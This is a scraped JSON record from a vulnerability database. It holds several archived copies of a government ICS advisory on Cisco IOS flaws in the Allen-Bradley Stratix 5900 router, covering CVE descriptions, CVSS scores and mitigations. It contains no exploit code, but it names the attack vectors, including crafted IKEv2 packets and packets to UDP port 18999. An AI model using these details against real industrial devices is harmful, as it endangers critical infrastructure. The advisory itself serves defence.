([AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n### 3.2.4 [USE OF EXTERNALLY-CONTROLLED FORMAT STRING CWE-134](<https://cwe.mitre.org/data/definitions/134.html>)\n\nA format string vulnerability in the LLDP subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an adjacent, unauthenticated attacker to cause a DoS condition or execute arbitrary code with elevated privileges.\n\n[CVE-2018-0175](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0175>) has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is ([AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n### 3.3 BACKGROUND\n\n * **Critical Infrastructure Sectors:** Critical Manufacturing, Energy, Water and Wastewater Systems\n * **Countries/Areas Deployed: **Worldwide\n * **Company Headquarters Location: **Wisconsin, USA\n\n### 3.4 RESEARCHER\n\nRockwell Automation reported these vulnerabilities to NCCIC from the semi-annual Cisco IOS and IOS XE Software Security Advisory Bundled Publication.\n\n## 4\\. MITIGATIONS\n\nRockwell Automation has released knowledge base article 1073313 which can be found at the following location:\n\n<https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1073313/> (login required)\n\nCisco has released Snort Rules 46110 and 46111 to help address CVE-2018-0158 and CVE-2018-0151. See new rules at:\n\n<https://www.cisco.com/web/software/286271056/117258/sf-rules-2018-03-29-new.html>\n\nCVE-2018-0151: Users who do not use the Adaptive QoS for DMVPN feature can deny all traffic destined to UDP port 18999 on an affected device by using a Control Plane Policing (CoPP) policy. If the Adaptive QoS for DMVPN feature is later configured, the device must be upgraded to an unaffected release of Cisco IOS Software or Cisco IOS XE Software and the CoPP policy must be removed.\n\nCVE-2018-0167 and CVE-2018-0175 have no specific mitigations in place. See the following Cisco Vulnerability advisory for more details:\n\n<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-lldp>\n\nRockwell Automation also recommends that users implement the following general security guidelines:\n\n * Help minimize network exposure for all control system devices and/or systems, and confirm that they are not accessible from the Internet.\n * Locate control system networks and devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nNCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nNCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS-CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT website.\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.\n\nNo known public exploits specifically target these vulnerabilities\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://www.us-cert.gov/ics \nor incident reporting: https://www.us-cert.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\nWas this document helpful? Yes | Somewhat | No\n", "enchantments": {"dependencies": {"modified": "2020-07-07T17:26:27", "references": [{"idList": ["ICSA-18-107-05", "ICSA-18-107-04"], "type": "ics"}, {"idList": ["MYHACK58:62201889900"], "type": "myhack58"}, {"idList": ["CISCO-SA-20180328-LLDP", "CISCO-SA-20180328-IKE", "CISCO-SA-20180328-QOS"], "type": "cisco"}, {"idList": ["CISCO-SA-20180328-LLDP-IOSXE.NASL", "CISCO-SA-20180328-IKE-IOSXE.NASL", "CISCO-SA-20180328-LLDP-IOS.NASL", "CISCO-SA-20180328-QOS-IOS.NASL", "CISCO-SA-20180328-LLDP-IOSXR.NASL", "CISCO-SA-20180328-QOS-IOSXE.NASL", "CISCO-SA-20180328-IKE-IOS.NASL"], "type": "nessus"}, {"idList": ["THREATPOST:B7DF4F28933004E3E4D52762786306C4"], "type": "threatpost"}, {"idList": ["CVE-2018-0175", "CVE-2018-0151", "CVE-2018-0158", "CVE-2018-0167"], "type": "cve"}], "rev": 2}, "score": {"modified": "2020-07-07T17:26:27", "rev": 2, "value": 8.1, "vector": "NONE"}}, "hash": "81cba55dbd69941f2c941e2fee80c5310e8dfe1c15611ef395785724b7b71cbd", "history": [], "href": "https://www.us-cert.gov//ics/advisories/ICSA-18-107-03", "id": "ICSA-18-107-03", "lastseen": "2020-07-07T17:26:27", "modified": "2018-04-25T00:00:00", "objectVersion": "1.4", "published": "2018-04-17T00:00:00", "references": ["https://www.dhs.gov/homeland-security-no-fear-act-reporting", "https://www.dhs.gov/plug-information", "https://www.dhs.gov/privacy-policy", "https://www.whitehouse.gov/", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSA-18-107-03", "https://cwe.mitre.org/data/definitions/20.html", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "https://www.dhs.gov/plain-writing-dhs", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSA-18-107-03", "/forms/feedback?helpful=yes&document=ICSA-18-107-03: Rockwell Automation Stratix Services Router&trackingNumber=&url=https://us-cert.cisa.gov/ics/advisories/ICSA-18-107-03&site_name=US-CERT", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0175", "https://www.oig.dhs.gov/", "https://twitter.com/share?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSA-18-107-03", "https://cwe.mitre.org/data/definitions/134.html", "https://www.cisco.com/web/software/286271056/117258/sf-rules-2018-03-29-new.html", "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1073313/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0167", "https://www.dhs.gov/freedom-information-act-foia", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-lldp", "http://twitter.com/icscert", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "https://www.dhs.gov", "https://www.usa.gov/", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "https://www.dhs.gov/", "/forms/feedback?helpful=no&document=ICSA-18-107-03: Rockwell Automation Stratix Services Router&trackingNumber=&url=https://us-cert.cisa.gov/ics/advisories/ICSA-18-107-03&site_name=US-CERT", "/forms/feedback?helpful=somewhat&document=ICSA-18-107-03: Rockwell Automation Stratix Services Router&trackingNumber=&url=https://us-cert.cisa.gov/ics/advisories/ICSA-18-107-03&site_name=US-CERT", "https://cwe.mitre.org/data/definitions/119.html", "https://cwe.mitre.org/data/definitions/119.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0158", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0151"], "reporter": "Industrial Control Systems Cyber Emergency Response Team", "title": "Rockwell Automation Stratix Services Router", "type": "ics", "viewCount": 7}, "differentElements": ["description"], "edition": 3, "lastseen": "2020-07-07T17:26:27"}, {"bulletin": {"bulletinFamily": "info", "cvelist": ["CVE-2018-0175", "CVE-2018-0151", "CVE-2018-0158", "CVE-2018-0167"], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 9.8**\n\n * **ATTENTION**: Exploitable remotely/low skill level to exploit.\n * **Vendor**: Rockwell Automation\n * **Equipment**: Allen-Bradley Stratix 5900 Services Router\n * **Vulnerabilities**: Improper Input Validation, Improper Restriction of Operations within the Bounds of a Memory Buffer, Use of Externally-Controlled Format String.\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of these vulnerabilities could result in loss of availability, confidentiality, and/or integrity caused by memory exhaustion, module restart, information corruption, and/or information exposure.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following versions of Allen-Bradley Stratix Services Router use a vulnerable version of Cisco IOS or IOS XE:\n\n * Allen-Bradley Stratix 5900 Services Router, version 15.6.3M1 and earlier.\n\n### 3.2 VULNERABILITY OVERVIEW\n\n### 3.2.1 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)\n\nA vulnerability in the Internet Key Exchange Version 2 (IKEv2) module of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated remote attacker to cause a memory leak or a reload of an affected device that leads to a denial of service (DoS) condition.\n\nThe vulnerability is due to incorrect processing of certain IKEv2 packets. An attacker could exploit this vulnerability by sending crafted IKEv2 packets to an affected device to be processed. A successful exploit could cause an affected device to continuously consume memory and eventually reload, resulting in a DoS condition.\n\n[CVE-2018-0158](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0158>) has been assigned to this vulnerability. A CVSS v3 base score of 8.6 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H>)).\n\n### 3.2.2 [IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFER CWE-119](<https://cwe.mitre.org/data/definitions/119.html>)\n\nA vulnerability in the quality of service (QoS) subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated remote attacker to cause a DoS condition or execute arbitrary code with elevated privileges.\n\nThe vulnerability is due to incorrect bounds checking of certain values in packets that are destined for UDP port 18999 of an affected device. An attacker could exploit this vulnerability by sending malicious packets to an affected device. When the packets are processed, an exploitable buffer overflow condition may occur. A successful exploit could allow the attacker to execute arbitrary code on the affected device with elevated privileges. The attacker could also leverage this vulnerability to cause the device to reload, causing a temporary DoS condition while the device is reloading.\n\nThe malicious packets must be destined to and processed by an affected device. Traffic transiting a device will not trigger the vulnerability.\n\n[CVE-2018-0151](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0151>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n### 3.2.3 [IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFER CWE-119](<https://cwe.mitre.org/data/definitions/119.html>)\n\nA buffer overflow vulnerability in the LLDP subsystem of Cisco IOS Software, Cisco IOS XE Software, and Cisco IOS XR Software could allow an adjacent, unauthenticated attacker to cause a DoS condition or execute arbitrary code with elevated privileges.\n\n[CVE-2018-0167](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0167>) has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is ([AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n### 3.2.4 [USE OF EXTERNALLY-CONTROLLED FORMAT STRING CWE-134](<https://cwe.mitre.org/data/definitions/134.html>)\n\nA format string vulnerability in the LLDP subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an adjacent, unauthenticated attacker to cause a DoS condition or execute arbitrary code with elevated privileges.\n\n[CVE-2018-0175](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0175>) has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is ([AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n### 3.3 BACKGROUND\n\n * **Critical Infrastructure Sectors:** Critical Manufacturing, Energy, Water and Wastewater Systems\n * **Countries/Areas Deployed: **Worldwide\n * **Company Headquarters Location: **Wisconsin, USA\n\n### 3.4 RESEARCHER\n\nRockwell Automation reported these vulnerabilities to NCCIC from the semi-annual Cisco IOS and IOS XE Software Security Advisory Bundled Publication.\n\n## 4\\. MITIGATIONS\n\nRockwell Automation has released knowledge base article 1073313 which can be found at the following location:\n\n<https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1073313/> (login required)\n\nCisco has released Snort Rules 46110 and 46111 to help address CVE-2018-0158 and CVE-2018-0151. See new rules at:\n\n<https://www.cisco.com/web/software/286271056/117258/sf-rules-2018-03-29-new.html>\n\nCVE-2018-0151: Users who do not use the Adaptive QoS for DMVPN feature can deny all traffic destined to UDP port 18999 on an affected device by using a Control Plane Policing (CoPP) policy. If the Adaptive QoS for DMVPN feature is later configured, the device must be upgraded to an unaffected release of Cisco IOS Software or Cisco IOS XE Software and the CoPP policy must be removed.\n\nCVE-2018-0167 and CVE-2018-0175 have no specific mitigations in place. See the following Cisco Vulnerability advisory for more details:\n\n<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-lldp>\n\nRockwell Automation also recommends that users implement the following general security guidelines:\n\n * Help minimize network exposure for all control system devices and/or systems, and confirm that they are not accessible from the Internet.\n * Locate control system networks and devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nNCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nNCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS-CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT website.\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.\n\nNo known public exploits specifically target these vulnerabilities\n\n## \nContact Information\n\nFor any questions related to this report, please contact the NCCIC at: \n \nEmail: [NCCICCUSTOMERSERVICE@hq.dhs.gov](<mailto:NCCICCUSTOMERSERVICE@hq.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: http://ics-cert.us-cert.gov \nor incident reporting: https://ics-cert.us-cert.gov/Report-Incident?\n\nThe NCCIC continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\nWas this document helpful? Yes | Somewhat | No\n", "enchantments": {"dependencies": {"modified": "2019-10-23T22:48:00", "references": [{"idList": ["ICSA-18-107-05", "ICSA-18-107-04"], "type": "ics"}, {"idList": ["MYHACK58:62201889900"], "type": "myhack58"}, {"idList": ["CISCO-SA-20180328-LLDP", "CISCO-SA-20180328-IKE", "CISCO-SA-20180328-QOS"], "type": "cisco"}, {"idList": ["THREATPOST:B7DF4F28933004E3E4D52762786306C4"], "type": "threatpost"}, {"idList": ["CVE-2018-0175", "CVE-2018-0151", "CVE-2018-0158", "CVE-2018-0167"], "type": "cve"}, {"idList": ["CISCO-SA-20180328-LLDP-IOSXE.NASL", "CISCO-SA-20180328-LLDP-IOS.NASL", "CISCO-SA-20180328-QOS-IOS.NASL", "CISCO-SA-20180328-LLDP-IOSXR.NASL", "CISCO-SA-20180328-QOS-IOSXE.NASL"], "type": "nessus"}]}, "score": {"modified": "2019-10-23T22:48:00", "value": 8.1, "vector": "NONE"}}, "hash": "696781e22eed7fc1838e2fc614bba27d963d1f4337103e525dfb0fe0ebc8d49f", "history": [], "href": "https://www.us-cert.gov//ics/advisories/ICSA-18-107-03", "id": "ICSA-18-107-03", "lastseen": "2019-10-23T22:48:00", "modified": "2018-04-25T00:00:00", "objectVersion": "1.4", "published": "2018-04-17T00:00:00", "references": ["/forms/feedback?helpful=yes&document=ICSA-18-107-03: Rockwell Automation Stratix Services Router&trackingNumber=&url=https://www.us-cert.gov/ics/advisories/ICSA-18-107-03&site_name=US-CERT", "https://www.dhs.gov/homeland-security-no-fear-act-reporting", "https://www.dhs.gov/plug-information", "https://www.dhs.gov/privacy-policy", "https://www.whitehouse.gov/", "https://cwe.mitre.org/data/definitions/20.html", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.us-cert.gov%2Fics%2Fadvisories%2FICSA-18-107-03", "https://www.dhs.gov/plain-writing-dhs", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0175", "https://www.oig.dhs.gov/", "https://cwe.mitre.org/data/definitions/134.html", "https://www.cisco.com/web/software/286271056/117258/sf-rules-2018-03-29-new.html", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fwww.us-cert.gov%2Fics%2Fadvisories%2FICSA-18-107-03", "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1073313/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0167", "https://www.dhs.gov/freedom-information-act-foia", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-lldp", "http://twitter.com/icscert", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "/forms/feedback?helpful=no&document=ICSA-18-107-03: Rockwell Automation Stratix Services Router&trackingNumber=&url=https://www.us-cert.gov/ics/advisories/ICSA-18-107-03&site_name=US-CERT", "https://www.dhs.gov", "https://www.usa.gov/", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "https://www.dhs.gov/", "https://twitter.com/share?url=https%3A%2F%2Fwww.us-cert.gov%2Fics%2Fadvisories%2FICSA-18-107-03", "https://cwe.mitre.org/data/definitions/119.html", "https://cwe.mitre.org/data/definitions/119.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0158", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0151", "/forms/feedback?helpful=somewhat&document=ICSA-18-107-03: Rockwell Automation Stratix Services Router&trackingNumber=&url=https://www.us-cert.gov/ics/advisories/ICSA-18-107-03&site_name=US-CERT"], "reporter": "Industrial Control Systems Cyber Emergency Response Team", "title": "Rockwell Automation Stratix Services Router", "type": "ics", "viewCount": 7}, "differentElements": ["description"], "edition": 1, "lastseen": "2019-10-23T22:48:00"}, {"bulletin": {"bulletinFamily": "info", "cvelist": ["CVE-2018-0175", "CVE-2018-0151", "CVE-2018-0158", "CVE-2018-0167"], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 9.8**\n\n * **ATTENTION**: Exploitable remotely/low skill level to exploit.\n * **Vendor**: Rockwell Automation\n * **Equipment**: Allen-Bradley Stratix 5900 Services Router\n * **Vulnerabilities**: Improper Input Validation, Improper Restriction of Operations within the Bounds of a Memory Buffer, Use of Externally-Controlled Format String.\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of these vulnerabilities could result in loss of availability, confidentiality, and/or integrity caused by memory exhaustion, module restart, information corruption, and/or information exposure.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following versions of Allen-Bradley Stratix Services Router use a vulnerable version of Cisco IOS or IOS XE:\n\n * Allen-Bradley Stratix 5900 Services Router, version 15.6.3M1 and earlier.\n\n### 3.2 VULNERABILITY OVERVIEW\n\n### 3.2.1 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)\n\nA vulnerability in the Internet Key Exchange Version 2 (IKEv2) module of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated remote attacker to cause a memory leak or a reload of an affected device that leads to a denial of service (DoS) condition.\n\nThe vulnerability is due to incorrect processing of certain IKEv2 packets. An attacker could exploit this vulnerability by sending crafted IKEv2 packets to an affected device to be processed. A successful exploit could cause an affected device to continuously consume memory and eventually reload, resulting in a DoS condition.\n\n[CVE-2018-0158](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0158>) has been assigned to this vulnerability. A CVSS v3 base score of 8.6 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H>)).\n\n### 3.2.2 [IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFER CWE-119](<https://cwe.mitre.org/data/definitions/119.html>)\n\nA vulnerability in the quality of service (QoS) subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated remote attacker to cause a DoS condition or execute arbitrary code with elevated privileges.\n\nThe vulnerability is due to incorrect bounds checking of certain values in packets that are destined for UDP port 18999 of an affected device. An attacker could exploit this vulnerability by sending malicious packets to an affected device. When the packets are processed, an exploitable buffer overflow condition may occur. A successful exploit could allow the attacker to execute arbitrary code on the affected device with elevated privileges. The attacker could also leverage this vulnerability to cause the device to reload, causing a temporary DoS condition while the device is reloading.\n\nThe malicious packets must be destined to and processed by an affected device. Traffic transiting a device will not trigger the vulnerability.\n\n[CVE-2018-0151](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0151>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n### 3.2.3 [IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFER CWE-119](<https://cwe.mitre.org/data/definitions/119.html>)\n\nA buffer overflow vulnerability in the LLDP subsystem of Cisco IOS Software, Cisco IOS XE Software, and Cisco IOS XR Software could allow an adjacent, unauthenticated attacker to cause a DoS condition or execute arbitrary code with elevated privileges.\n\n[CVE-2018-0167](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0167>) has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is ([AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n### 3.2.4 [USE OF EXTERNALLY-CONTROLLED FORMAT STRING CWE-134](<https://cwe.mitre.org/data/definitions/134.html>)\n\nA format string vulnerability in the LLDP subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an adjacent, unauthenticated attacker to cause a DoS condition or execute arbitrary code with elevated privileges.\n\n[CVE-2018-0175](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0175>) has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is ([AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n### 3.3 BACKGROUND\n\n * **Critical Infrastructure Sectors:** Critical Manufacturing, Energy, Water and Wastewater Systems\n * **Countries/Areas Deployed: **Worldwide\n * **Company Headquarters Location: **Wisconsin, USA\n\n### 3.4 RESEARCHER\n\nRockwell Automation reported these vulnerabilities to NCCIC from the semi-annual Cisco IOS and IOS XE Software Security Advisory Bundled Publication.\n\n## 4\\. MITIGATIONS\n\nRockwell Automation has released knowledge base article 1073313 which can be found at the following location:\n\n<https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1073313/> (login required)\n\nCisco has released Snort Rules 46110 and 46111 to help address CVE-2018-0158 and CVE-2018-0151. See new rules at:\n\n<https://www.cisco.com/web/software/286271056/117258/sf-rules-2018-03-29-new.html>\n\nCVE-2018-0151: Users who do not use the Adaptive QoS for DMVPN feature can deny all traffic destined to UDP port 18999 on an affected device by using a Control Plane Policing (CoPP) policy. If the Adaptive QoS for DMVPN feature is later configured, the device must be upgraded to an unaffected release of Cisco IOS Software or Cisco IOS XE Software and the CoPP policy must be removed.\n\nCVE-2018-0167 and CVE-2018-0175 have no specific mitigations in place. See the following Cisco Vulnerability advisory for more details:\n\n<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-lldp>\n\nRockwell Automation also recommends that users implement the following general security guidelines:\n\n * Help minimize network exposure for all control system devices and/or systems, and confirm that they are not accessible from the Internet.\n * Locate control system networks and devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nNCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nNCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS-CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT website.\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.\n\nNo known public exploits specifically target these vulnerabilities\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSA-18-107-03>); we'd welcome your feedback.\n", "enchantments": {"dependencies": {"modified": "2021-02-24T09:28:33", "references": [{"idList": ["ICSA-18-107-05", "ICSA-18-107-04"], "type": "ics"}, {"idList": ["MYHACK58:62201889900"], "type": "myhack58"}, {"idList": ["CISCO-SA-20180328-LLDP", "CISCO-SA-20180328-IKE", "CISCO-SA-20180328-QOS"], "type": "cisco"}, {"idList": ["CISCO-SA-20180328-LLDP-IOSXE.NASL", "CISCO-SA-20180328-IKE-IOSXE.NASL", "CISCO-SA-20180328-LLDP-IOS.NASL", "CISCO-SA-20180328-QOS-IOS.NASL", "CISCO-SA-20180328-LLDP-IOSXR.NASL", "CISCO-SA-20180328-QOS-IOSXE.NASL", "CISCO-SA-20180328-IKE-IOS.NASL"], "type": "nessus"}, {"idList": ["THREATPOST:B7DF4F28933004E3E4D52762786306C4"], "type": "threatpost"}, {"idList": ["CVE-2018-0175", "CVE-2018-0151", "CVE-2018-0158", "CVE-2018-0167"], "type": "cve"}], "rev": 2}, "score": {"modified": "2021-02-24T09:28:33", "rev": 2, "value": 8.1, "vector": "NONE"}}, "hash": "2ba72ed266b69bc13373c6df6fe83fd0", "history": [], "href": "https://www.us-cert.gov//ics/advisories/ICSA-18-107-03", "id": "ICSA-18-107-03", "lastseen": "2021-02-24T09:28:33", "modified": "2018-04-25T00:00:00", "objectVersion": "1.4", "published": "2018-04-17T00:00:00", "references": ["https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSA-18-107-03", "https://www.dhs.gov/homeland-security-no-fear-act-reporting", "https://www.dhs.gov/plug-information", "https://www.dhs.gov/privacy-policy", "https://www.whitehouse.gov/", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSA-18-107-03", "https://cwe.mitre.org/data/definitions/20.html", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "https://www.dhs.gov/plain-writing-dhs", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSA-18-107-03", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0175", 